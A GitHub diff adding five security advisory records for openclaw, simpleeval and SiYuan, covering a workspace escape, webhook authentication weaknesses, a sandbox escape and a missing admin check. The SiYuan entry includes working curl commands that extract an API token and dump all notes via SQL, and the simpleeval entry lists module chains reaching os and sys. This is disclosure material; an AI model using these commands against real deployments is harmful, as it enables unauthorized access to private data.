github
diff --git a/‎advisories/github-reviewed/2026/03/GHSA-2rqg-gjgv-84jm/GHSA-2rqg-gjgv-84jm.json‎
Lines changed: 62 additions & 0 deletions b/‎advisories/github-reviewed/2026/03/GHSA-2rqg-gjgv-84jm/GHSA-2rqg-gjgv-84jm.json‎
Lines changed: 62 additions & 0 deletions
diff --git a/‎advisories/github-reviewed/2026/03/GHSA-44vg-5wv2-h2hg/GHSA-44vg-5wv2-h2hg.json‎
Lines changed: 62 additions & 0 deletions b/‎advisories/github-reviewed/2026/03/GHSA-44vg-5wv2-h2hg/GHSA-44vg-5wv2-h2hg.json‎
Lines changed: 62 additions & 0 deletions
diff --git a/‎advisories/github-reviewed/2026/03/GHSA-4j3x-hhg2-fm2x/GHSA-4j3x-hhg2-fm2x.json‎
Lines changed: 65 additions & 0 deletions b/‎advisories/github-reviewed/2026/03/GHSA-4j3x-hhg2-fm2x/GHSA-4j3x-hhg2-fm2x.json‎
Lines changed: 65 additions & 0 deletions
diff --git a/‎advisories/github-reviewed/2026/03/GHSA-5m9r-p9g7-679c/GHSA-5m9r-p9g7-679c.json‎
Lines changed: 70 additions & 0 deletions b/‎advisories/github-reviewed/2026/03/GHSA-5m9r-p9g7-679c/GHSA-5m9r-p9g7-679c.json‎
Lines changed: 70 additions & 0 deletions
diff --git a/‎advisories/github-reviewed/2026/03/GHSA-g353-mgv3-8pcj/GHSA-g353-mgv3-8pcj.json‎
Lines changed: 70 additions & 0 deletions b/‎advisories/github-reviewed/2026/03/GHSA-g353-mgv3-8pcj/GHSA-g353-mgv3-8pcj.json‎
Lines changed: 70 additions & 0 deletions
@@ -0,0 +1,62 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-2rqg-gjgv-84jm",
+  "modified": "2026-03-13T20:55:30Z",
+  "published": "2026-03-13T20:55:30Z",
+  "aliases": [],
+  "summary": "OpenClaw: Gateway `agent` calls could override the workspace boundary",
+  "details": "### Summary\n\nThe public gateway `agent` RPC allowed an authenticated operator with `operator.write` to supply attacker-controlled `spawnedBy` and `workspaceDir` values. That let the caller re-root the agent run outside its configured workspace boundary.\n\n### Impact\n\nA non-owner operator could escape the intended workspace boundary and run normal file and exec tools from an arbitrary process-accessible directory.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.8`\n\n### Patch\n\nFixed in `openclaw` `2026.3.11` and included in later releases such as `2026.3.12`. The gateway now enforces the configured workspace boundary for agent runs regardless of caller-supplied overrides.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "openclaw"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "2026.3.11"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 2026.3.8"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2rqg-gjgv-84jm"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/openclaw/openclaw"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-668"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-13T20:55:30Z",
+    "nvd_published_at": null
+  }
+}
@@ -0,0 +1,62 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-44vg-5wv2-h2hg",
+  "modified": "2026-03-13T20:56:27Z",
+  "published": "2026-03-13T20:56:26Z",
+  "aliases": [
+    "CVE-2026-32640"
+  ],
+  "summary": "SimpleEval: Objects (including modules) can leak dangerous modules through to direct access inside the sandbox",
+  "details": "### Impact\nIf the objects passed in as `names` to SimpleEval have modules or other disallowed / dangerous objects available as attrs.\nAdditionally, dangerous functions or modules could be accessed by passing them as callbacks to other safe functions to call.\n\nExamples (found by @ByamB4):\n\nAny module where non-underscore attribute chains reach os or sys:\n- os.path, pathlib, shutil, glob (direct .os / .sys attributes)\n- statistics (has .sys)\n- numpy (has .ctypeslib.os and .f2py.sys)\n- urllib.parse (has .warnings.sys)\n\n### Patches\nThe latest version 1.0.5 has this issue fixed.\n\n### Workarounds\nDon't pass in objects or modules which have direct attributes to potentially dangerous items.\nUse a wrapper to wrap the potentially vulnerable items (See the ModuleWrapper in version 1.0.5)",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "simpleeval"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "1.0.5"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/danthedeckie/simpleeval/security/advisories/GHSA-44vg-5wv2-h2hg"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/danthedeckie/simpleeval"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/danthedeckie/simpleeval/releases/tag/1.0.5"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-915",
+      "CWE-94"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-13T20:56:26Z",
+    "nvd_published_at": null
+  }
+}
@@ -0,0 +1,65 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-4j3x-hhg2-fm2x",
+  "modified": "2026-03-13T20:56:47Z",
+  "published": "2026-03-13T20:56:47Z",
+  "aliases": [
+    "CVE-2026-32704"
+  ],
+  "summary": "SiYuan's renderSprig has a missing admin check that allows any user to read full workspace DB",
+  "details": "### Summary\n`POST /api/template/renderSprig` lacks `model.CheckAdminRole`, allowing any authenticated user to execute arbitrary SQL queries against the SiYuan workspace database and exfiltrate all note content, metadata, and custom attributes.\n\n### Details\n**File:** `kernel/api/router.go`\n\nEvery sensitive endpoint in the codebase uses `model.CheckAuth + model.CheckAdminRole`, but `renderSprig` only has `CheckAuth`:\n\n```go\n//  Missing CheckAdminRole\nginServer.Handle(\"POST\", \"/api/template/renderSprig\",\n    model.CheckAuth, renderSprig)\n\n//  Correct pattern used by all other data endpoints\nginServer.Handle(\"POST\", \"/api/template/render\",\n    model.CheckAuth, model.CheckAdminRole, model.CheckReadonly, renderTemplate)\n```\n\n`renderSprig` calls `model.RenderGoTemplate` (`kernel/model/template.go`) which registers SQL functions from `kernel/sql/database.go`:\n\n```go\n(*templateFuncMap)[\"querySQL\"] = func(stmt string) (ret []map[string]interface{}) {\n    ret, _ = Query(stmt, 1024)  // executes raw SELECT, no role check\n    return\n}\n```\n\nAny authenticated user - including Publish Service **Reader** role accounts - can call this endpoint and execute arbitrary SELECT queries.\n\n### PoC\n**Environment:**\n```bash\ndocker run -d --name siyuan -p 6806:6806 \\\n  -v $(pwd)/workspace:/siyuan/workspace \\\n  b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123\n```\n\n**Exploit:**\n```bash\n# Step 1: Login and retrieve API token\ncurl -s -X POST http://localhost:6806/api/system/loginAuth \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"authCode\":\"test123\"}' -c /tmp/siy.cookie\n\nsleep 15  # wait for boot\n\nTOKEN=$(curl -s -X POST http://localhost:6806/api/system/getConf \\\n  -b /tmp/siy.cookie -H \"Content-Type: application/json\" -d '{}' \\\n  | python3 -c \"import sys,json; print(json.load(sys.stdin)['data']['conf']['api']['token'])\")\n\n# Step 2: Execute SQL as non-admin user\ncurl -s -X POST http://localhost:6806/api/template/renderSprig \\\n  -H \"Authorization: Token $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"template\":\"{{querySQL \\\"SELECT count(*) as n FROM blocks\\\" | toJson}}\"}'\n```\n\n**Confirmed response on v3.6.0:**\n```json\n{\"code\":0,\"msg\":\"\",\"data\":\"[{\\\"n\\\":0}]\"}\n```\n\n**Full note dump:**\n```bash\ncurl -s -X POST http://localhost:6806/api/template/renderSprig \\\n  -H \"Authorization: Token $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"template\":\"{{range $r := (querySQL \\\"SELECT hpath,content FROM blocks LIMIT 100\\\")}}{{$r.hpath}}: {{$r.content}}\\n{{end}}\"}'\n```\n\n### Impact\nAny authenticated user (API token holder, Publish Service Reader) can:\n- Dump **all note content** and document hierarchy from the workspace\n- Exfiltrate tags, custom attributes, block IDs, and timestamps\n- Search notes for stored passwords, API keys, or personal data\n- Enumerate all notebooks and their structure\n\nThis is especially severe in shared or enterprise deployments where lower-privilege accounts should not have access to other users' notes.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/siyuan-note/siyuan/kernel"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "3.6.1"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 3.6.0"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-4j3x-hhg2-fm2x"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/siyuan-note/siyuan/issues/17209"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/siyuan-note/siyuan"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-285",
+      "CWE-732"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-13T20:56:47Z",
+    "nvd_published_at": null
+  }
+}
@@ -0,0 +1,70 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-5m9r-p9g7-679c",
+  "modified": "2026-03-13T20:55:38Z",
+  "published": "2026-03-13T20:55:38Z",
+  "aliases": [],
+  "summary": "OpenClaw: Zalo webhook rate limiting could be bypassed before secret validation",
+  "details": "### Summary\n\nThe Zalo webhook handler applied request rate limiting only after webhook authentication succeeded. Requests with an invalid secret returned `401` but did not count against the rate limiter, allowing repeated secret guesses without triggering `429`.\n\n### Impact\n\nThis made brute-force guessing materially easier for weak but policy-compliant webhook secrets. Once the secret was guessed, an attacker could submit forged Zalo webhook traffic.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.11`\n\n### Patch\n\nFixed in `openclaw` `2026.3.12`. Rate limiting now applies before successful authentication is required, closing the pre-auth brute-force gap. Users should update to `2026.3.12` or later and prefer strong webhook secrets.",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "openclaw"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "2026.3.12"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 2026.3.11"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5m9r-p9g7-679c"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/openclaw/openclaw/pull/44173"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/openclaw/openclaw/commit/f96ba87f033a14183fa0ede912df3a592eef55ff"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/openclaw/openclaw"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.12"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-307"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-13T20:55:38Z",
+    "nvd_published_at": null
+  }
+}
@@ -0,0 +1,70 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-g353-mgv3-8pcj",
+  "modified": "2026-03-13T20:55:34Z",
+  "published": "2026-03-13T20:55:34Z",
+  "aliases": [],
+  "summary": "OpenClaw: Feishu webhook mode accepted forged events when only `verificationToken` was configured",
+  "details": "### Summary\n\nFeishu webhook mode allowed deployments that configured only `verificationToken` without `encryptKey`. In that state, forged inbound events could be accepted because the weaker configuration did not provide the required cryptographic verification boundary.\n\n### Impact\n\nAn unauthenticated network attacker who could reach the webhook endpoint could inject forged Feishu events, impersonate senders, and potentially trigger downstream tool execution subject to the local agent policy.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.11`\n\n### Patch\n\nFixed in `openclaw` `2026.3.12`. Feishu webhook mode now fails closed unless `encryptKey` is configured, and the webhook transport rejects missing or invalid signatures before dispatch. Update to `2026.3.12` or later and configure `encryptKey` for webhook deployments.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "openclaw"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "2026.3.12"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 2026.3.11"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g353-mgv3-8pcj"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/openclaw/openclaw/pull/44087"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/openclaw/openclaw/commit/7844bc89a1612800810617c823eb0c76ef945804"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/openclaw/openclaw"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.12"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-347"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-13T20:55:34Z",
+    "nvd_published_at": null
+  }
+}